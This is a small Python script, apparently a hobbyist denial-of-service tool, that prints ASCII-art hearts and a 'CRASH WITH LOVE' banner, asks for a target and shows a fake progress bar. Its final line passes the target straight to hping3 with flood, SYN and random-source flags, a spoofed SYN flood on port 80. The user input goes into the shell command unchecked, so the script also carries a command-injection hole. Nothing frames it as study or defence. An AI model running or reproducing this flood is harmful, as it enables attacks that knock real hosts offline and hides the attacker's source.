import os
import time
from colorama import Fore, Back, Style 

os.system('clear')
logo = """                        @@@@@@           @@@@@@
                     @@@@@@@@@@       @@@@@@@@@@
                   @@@@@@@@@@@@@@   @@@@@@@@@@@@@@
                 @@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@
                @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
               @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
               @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
               @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                   @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                     @@@@@@@@@@@@@@@@@@@@@@@@@@@
                       @@@@@@@@@@@@@@@@@@@@@@@
                         @@@@@@@@@@@@@@@@@@@
                           @@@@@@@@@@@@@@@
                             @@@@@@@@@@@
                               @@@@@@@
                                 @@@
                                  @


                        <--CRASH WITH LOVE-->

"""
try:
   print (Fore.RED + logo)

   print ('-' * 70)
   target = input(Fore.BLUE + '                           target > ')
   print (Fore.RED + '-' * 70)
   print ('')
   print ('')
   print ('[starting attack<-->       ]')
   time.sleep(1)
   print ('[starting attack<----->    ]')
   time.sleep(1)
   print ('[starting attack<------->  ]')
   time.sleep(0.5)
   print ('[starting attack<--------->]')
   os.system('clear')
   print (''' ────────╠███████───███████╠─────────────
   ───────╠█████████─╠█████████────────────
   ───────█████████████████████╠───────────
   ──────╠██████████████████████───────────
   ──────███████████████████████───────────
   ──────███████████████████████╠──────────
   ──────███████████████████████╠──────────
   ──────███████████████████████───────────
   ──────╠██████████████████████───────────
   ──────╠█████████████████████╠───────────
   ───────█████████████████████────────────
   ──────╠███████████████████╠────────────
   ────────╠███████████──╠████─────────────
   ─────────██████████─────╠█╠─────────────
   ─────────╠████████──███─────────────────
   ──────────╠███████─╠█████───────────────
   ─────╠╠────╠██████─╠███████─────────────
   ──█████╠────╠█████╠─╠███████╠───────────
   ─╠███████╠█╠─╠█████╠──████████╠─────────
   ╠███████████╠──█████───╠████████╠───────
   ╠█████████████──╠██╠─────╠████████╠─────
   ─██████████████───────────█████████╠────
   ──╠█████████████╠───────╠███████████╠───
   ───╠█████████████████████████████████╠──
   ────╠█████████████████████████████████──
   ─────╠█████████████████████████████████─
   ───────████████████████████████████████╠
   ────────╠███████████████████████████████
   ─────────╠██████████████████████████████
   ───────────█████████████████████████████
   ────────────╠██████████████████████████─
   ───────────────────────────────╠██████──
   ─────────────────────────────────███╠───
   ─────────────────────────────────╠█╠────


   ''')
   os.system('hping3 ' + target + ' -q -n -d 120 -S -p 80 --flood --rand-source')
except: 
   os.system('clear')
   print (Fore.GREEN + 'something went wrong! :(')
   time.sleep(2.5)
   os.system('clear')
   quit()
